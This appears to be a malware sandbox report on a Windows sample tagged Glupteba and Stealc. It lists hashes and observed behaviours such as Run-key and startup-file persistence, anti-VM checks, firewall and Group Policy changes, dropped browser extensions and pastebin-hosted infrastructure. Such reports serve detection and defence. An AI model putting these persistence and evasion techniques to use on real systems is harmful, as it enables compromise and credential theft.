SHA512 5e4a05added9a614dcc0b89ecc96e0bdcb33ef8ab5a66a4a096eaf697efae201f22de9f6c5f65a2fe7239f995670ab5d7e00fd6556a48b7a2eb9f2d4e830f9cc

C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Preferences

MD5 7d47ee664a4e49a2e157c928bdceef3e
SHA1 aca2efcbd04ab7cffd04e31228d3192692f7b82b
SHA256 7ccee053dc9cbc1b6537c0eba8f93e448566c6ba347fb8cb31e6a58a35aa3f4f
SHA512 f56992cfcb5caf9567623b8451ebaeeaa2f0790ac1fe30f0b1509033ac934f72f7ebbc8e573e3bdce5e2d38ee99a8f89a6658cba7da5d6243aa9b0302476f31f

Analysis: behavioral2

Detonation Overview

Submitted

2024-04-19 14:04

Reported

2024-04-19 14:07

Platform

win11-20240412-en

Max time kernel

149s

Max time network

151s

Command Line

"C:\Users\Admin\AppData\Local\Temp\d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe"

Signatures

Glupteba

loader dropper glupteba

Glupteba payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Modifies firewall policy service

evasion
Description Indicator Process Target
Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" C:\Users\Admin\Pictures\XrPxlDIYiTy2ckRQ7B7AEfDZ.exe N/A

Stealc

stealer stealc

Identifies VirtualBox via ACPI registry values (likely anti-VM)

evasion
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\ACPI\DSDT\VBOX__ C:\Users\Admin\Pictures\XrPxlDIYiTy2ckRQ7B7AEfDZ.exe N/A

Blocklisted process makes network request

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\rundll32.exe N/A
N/A N/A C:\Windows\system32\msiexec.exe N/A

Downloads MZ/PE file

Modifies Windows Firewall

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\netsh.exe N/A
N/A N/A C:\Windows\system32\netsh.exe N/A

Checks BIOS information in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\Pictures\XrPxlDIYiTy2ckRQ7B7AEfDZ.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion C:\Users\Admin\Pictures\XrPxlDIYiTy2ckRQ7B7AEfDZ.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Users\Admin\AppData\Local\Temp\7zS8443.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion C:\Windows\SysWOW64\rundll32.exe N/A

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Control Panel\International\Geo\Nation C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\vLxMkquwj2YLyeMbPWIrM04m.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Lma0w8jNTTBEKB4j2ImfhlKl.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BJcupLuUarzm5XXQzG6ujYry.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\9XtibT4Yf4gH04TbrqAhIOG1.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\e3y42iPJ08drhXOmj3ez4uBU.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\BwNhJ3ZI8lFiFlan3IJP72hk.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\iLLA17oZmuYEQ42ykMCFYANl.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe N/A
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\4vHWCNg1n0gUuFSrnQ517HiF.bat C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\Pictures\B8Ng9DuIJgnvrbMHtNWim1HP.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u2dg.0.exe N/A
N/A N/A C:\Users\Admin\Pictures\z3XO3y8eiP2BsC1smWlI5r5w.exe N/A
N/A N/A C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe N/A
N/A N/A C:\Users\Admin\Pictures\XrPxlDIYiTy2ckRQ7B7AEfDZ.exe N/A
N/A N/A C:\Users\Admin\Pictures\z3XO3y8eiP2BsC1smWlI5r5w.exe N/A
N/A N/A C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe N/A
N/A N/A C:\Users\Admin\Pictures\OYYF9HTQ5SJVtUftEvg2Vczg.exe N/A
N/A N/A C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe N/A
N/A N/A C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\3BVFDXkt09D3q0LgQVE6DprB.exe N/A
N/A N/A C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\7zS8443.tmp\Install.exe N/A
N/A N/A C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe N/A
N/A N/A C:\Windows\rss\csrss.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404521\assistant\Assistant_109.0.5097.45_Setup.exe_sfx.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\csrss\injector\injector.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404521\assistant\assistant_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\.opera\Opera Installer Temp\opera_package_202404191404521\assistant\assistant_installer.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\u2dg.3.exe N/A
N/A N/A C:\Windows\windefender.exe N/A
N/A N/A C:\Windows\windefender.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\AIZVKOw.exe N/A
N/A N/A C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe N/A
N/A N/A C:\Users\Admin\Pictures\m2oZU2kuNyXNzQIRlFQBnoBQ.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ce-installer_7.14.2_vbox-6.1.20.exe N/A

Reads user/profile data of web browsers

spyware stealer

UPX packed file

upx
Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" C:\Users\Admin\Pictures\m2oZU2kuNyXNzQIRlFQBnoBQ.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\Pictures\z3XO3y8eiP2BsC1smWlI5r5w.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-3263309122-2820180308-3568046652-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\"" C:\Windows\rss\csrss.exe N/A

Checks installed software on the system

discovery

Checks whether UAC is enabled

evasion trojan
Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA C:\Users\Admin\Pictures\XrPxlDIYiTy2ckRQ7B7AEfDZ.exe N/A

Drops Chrome extension

Description Indicator Process Target
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\oikgcnjambfooaigmdljblbaeelmekem\1.0.0.0\manifest.json C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe N/A
File created C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\agcghmjnenlfcjmnldooeaadankclolo\1.4_0\manifest.json C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe N/A

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\$RECYCLE.BIN\S-1-5-18\desktop.ini C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\D: C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe N/A
File opened (read-only) \??\M: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\N: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Q: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\S: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\H: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\O: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\T: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Y: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\D: C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe N/A
File opened (read-only) \??\G: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\I: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\K: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\V: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\W: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\B: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\J: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\L: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\P: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\R: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\U: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\X: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\Pictures\3BVFDXkt09D3q0LgQVE6DprB.exe N/A
File opened (read-only) \??\A: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\E: C:\Windows\system32\msiexec.exe N/A
File opened (read-only) \??\Z: C:\Windows\system32\msiexec.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A pastebin.com N/A N/A
N/A pastebin.com N/A N/A

Manipulates WinMonFS driver.

rootkit evasion
Description Indicator Process Target
File opened for modification \??\WinMonFS C:\Windows\rss\csrss.exe N/A

Drops file in System32 directory

Description Indicator Process Target
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15 C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\Content.IE5 C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91 C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\103621DE9CD5414CC2538780B4B75751 C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCookies C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\gpt.ini C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\AIZVKOw.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\INetCache\IE C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F3258A5B11F1178F530EE7A0197D8F15 C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe N/A
File created C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\system32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\AppData\Local\Temp\JMPZeWvHhArmqROvY\NwfPJCCpQqPYDzK\AIZVKOw.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\History\History.IE5 C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_155F6CC932BF304EF612DAA091EECD91 C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F3258A5B11F1178F530EE7A0197D8F15 C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\24BD96D5497F70B3F510A6B53CD43F3E_3A89246FB90C5EE6620004F1AE0EB0EA C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306 C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy C:\Users\Admin\Pictures\XrPxlDIYiTy2ckRQ7B7AEfDZ.exe N/A
File created C:\Windows\System32\GroupPolicy\Machine\Registry.pol C:\Users\Admin\Pictures\XrPxlDIYiTy2ckRQ7B7AEfDZ.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\CAF4703619713E3F18D8A9D5D88D6288_A7725538C46DE2D0088EE44974E2CEBA C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\F07644E38ED7C9F37D11EEC6D4335E02_22265154E37786E06D33C3F357FE6306 C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\265C0DEB29181DD1891051371C5F863A_4AAAE8DA7A12C7A50B5920DE5F0F0D15 C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\gpt.ini C:\Users\Admin\Pictures\XrPxlDIYiTy2ckRQ7B7AEfDZ.exe N/A
File opened for modification C:\Windows\System32\GroupPolicy\GPT.INI C:\Users\Admin\Pictures\XrPxlDIYiTy2ckRQ7B7AEfDZ.exe N/A
File opened for modification C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of NtSetInformationThreadHideFromDebugger

Description Indicator Process Target
N/A N/A C:\Users\Admin\Pictures\XrPxlDIYiTy2ckRQ7B7AEfDZ.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4960 set thread context of 4284 N/A C:\Users\Admin\AppData\Local\Temp\d007291fcf888c4009a7a389deb36534955ae7ffb668896b02a5532f7b3122c4.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe

Checks for VirtualBox DLLs, possible anti-VM trick

Description Indicator Process Target
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe N/A
File opened (read-only) \??\VBoxMiniRdrDN C:\Users\Admin\Pictures\z3XO3y8eiP2BsC1smWlI5r5w.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File created C:\Program Files (x86)\RVqmAwyyxwiU2\LHvjJyj.xml C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe N/A
File created C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\GaDkQze.dll C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe N/A
File created C:\Program Files (x86)\ZNFwAtDdLFAMCeemzDR\FaYwZcq.xml C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe N/A
File created C:\Program Files (x86)\ARTXeDTAxvUn\ILNjVYD.dll C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\features\{85FD6ACE-3736-491B-8514-6C8C9556E131}.xpi C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe N/A
File created C:\Program Files (x86)\ByWuwrOBU\WnleIRa.xml C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe N/A
File created C:\Program Files (x86)\DUGaRsFaSnqjC\qaeykIa.dll C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe N/A
File created C:\Program Files (x86)\DUGaRsFaSnqjC\OTNmBJT.xml C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe N/A
File created C:\Program Files (x86)\ByWuwrOBU\ojTVpK.dll C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe N/A
File created C:\Program Files\Mozilla Firefox\browser\omni.ja.bak C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe N/A
File opened for modification C:\Program Files\Mozilla Firefox\browser\omni.ja C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe N/A
File created C:\Program Files (x86)\RVqmAwyyxwiU2\BoPjNTTVXpgKP.dll C:\Windows\Temp\ofqvFcNvzeRditbz\sCLSBctEBYVgufH\SPYXfri.exe N/A

Drops file in Windows directory

Description Indicator Process Target
File opened for modification C:\Windows\windefender.exe C:\Windows\rss\csrss.exe N/A
File created C:\Windows\Tasks\QhciBzJOokLnyYZub.job C:\Windows\SysWOW64\schtasks.exe N/A
File opened for modification C:\Windows\rss C:\Users\Admin\Pictures\z3XO3y8eiP2BsC1smWlI5r5w.exe N/A
File created C:\Windows\windefender.exe C:\Windows\rss\csrss.exe N/A
File created C:\Windows\Tasks\qbSDwEgyNYPZlGA.job C:\Windows\SysWOW64\schtasks.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\Pictures\z3XO3y8eiP2BsC1smWlI5r5w.exe N/A
File created C:\Windows\rss\csrss.exe C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe N/A
File created C:\Windows\Tasks\BAnwxolbGpCzXNxkj.job C:\Windows\SysWOW64\schtasks.exe N/A
File opened for modification C:\Windows\Installer\e5991a7.msi C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Installer\e5991a7.msi C:\Windows\system32\msiexec.exe N/A
File opened for modification C:\Windows\Microsoft.NET\Framework64\v4.0.30319\ngen.log C:\Windows\system32\msiexec.exe N/A
File created C:\Windows\Tasks\bWycNackLSywaqkmgR.job C:\Windows\SysWOW64\schtasks.exe N/A
File opened for modification C:\Windows\rss C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe N/A

Launches sc.exe

Description Indicator Process Target
N/A N/A C:\Windows\SysWOW64\sc.exe N/A

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\u2dg.3.exe N/A
Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\u2dg.3.exe N/A
Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI C:\Users\Admin\AppData\Local\Temp\u2dg.3.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Users\Admin\AppData\Local\Temp\7zS8443.tmp\Install.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Users\Admin\AppData\Local\Temp\7zS8443.tmp\Install.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Windows\SysWOW64\rundll32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Windows\SysWOW64\rundll32.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2041 = "Eastern Daylight Time (Mexico)" C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe N/A
Set value (str) \REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\26\52C64B7E\C:\Windows\system32\,@tzres.dll,-2752 = "Tomsk Standard Time" C:\Users\Admin\Pictures\GjI6ioR6cLVRryk8D6Bj6r6Y.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe N/A
